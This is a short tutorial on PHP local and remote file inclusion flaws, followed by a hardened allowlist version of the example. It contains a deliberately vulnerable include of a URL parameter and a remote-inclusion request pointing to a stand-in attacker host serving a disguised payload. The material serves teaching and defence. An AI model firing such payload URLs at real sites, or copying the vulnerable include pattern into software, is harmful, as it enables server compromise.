Overview of file inclusion vulnerabilities and a demonstration of their classification
Introduction to inclusion vulnerabilities
Include operations are provided by most web languages, but PHP's file inclusion is especially powerful and flexible, so inclusion vulnerabilities appear most often in PHP. This leads to a misconception: many beginners believe that inclusion vulnerabilities occur only in PHP, unaware that they can occur in other languages as well. As the old saying goes: the more powerful the feature, the more vulnerabilities it has.
Reason for the vulnerability
Inclusion vulnerabilities are not a problem of the language, but a problem of how people think.
Four include file functions in PHP
include()
include_once()
require()
require_once()
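When auditing code, focus on finding these functions.
The reason is that the argument values of these functions are all parsed as PHP files.
Classification of PHP inclusion vulnerabilities
Local file inclusion (LFI)
That is, the argument passed to the function is changed to a file that is local to the server.
For example: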
main.php
<?php
// Vulnerable: the page parameter from the URL is passed straight to include
include "$_GET[page]";
?>
1.html
Page 1
Now enter http://192.168.1.55:8080/include/main.php?page=1.html
and 1.html is executed directly.
Note that the php.ini configuration file needs allow_url_include=on and magic_quotes_gpc=off
Remote inclusion
That is, the argument passed to the function is changed to a file under a web site directory specified by the attacker. It does not have to be the attacker's own site; any site will do.
Directly enter http://192.168.1.55:8080/include/main.php?page=Attacker IP/include/muma.jpg
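
A hardened counterpart to the main.php shown above, covering both the local and the remote case; this is an added example, not code from the original page. The allowlist entries, the pages/ directory and the resolvePage() helper are assumptions for illustration, and the code targets PHP 8.

```php
<?php
// Added example: the include target is chosen from a fixed allowlist
// instead of being taken from the request.
// PAGES, the pages/ directory and resolvePage() are assumed names.
// php.ini: keep allow_url_include = Off (the default) so that
// include/require refuse http://, ftp:// and data: targets.
declare(strict_types=1);

// The only values accepted for ?page=
const PAGES = ['1.html', '2.html'];

/**
 * Resolve a user-supplied page name to an absolute path inside $baseDir.
 * Returns null when the name is not allowlisted, the file is missing,
 * or the resolved path lies outside $baseDir.
 */
function resolvePage(mixed $name, string $baseDir): ?string
{
    // ?page[]=x arrives as an array; only exact string matches pass.
    if (!is_string($name) || !in_array($name, PAGES, true)) {
        return null;
    }
    // realpath() resolves ../ and symlinks and returns false if missing.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved file must still be under $baseDir.
    if (!str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$path = resolvePage($_GET['page'] ?? null, __DIR__ . '/pages');
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}

// Static pages are sent as data with readfile(), so nothing in them is
// parsed as PHP even if the file content has been tampered with.
readfile($path);
```

With this version, a request such as main.php?page=1.html still returns the page, while any value outside PAGES, including a path or a URL, gets a 404.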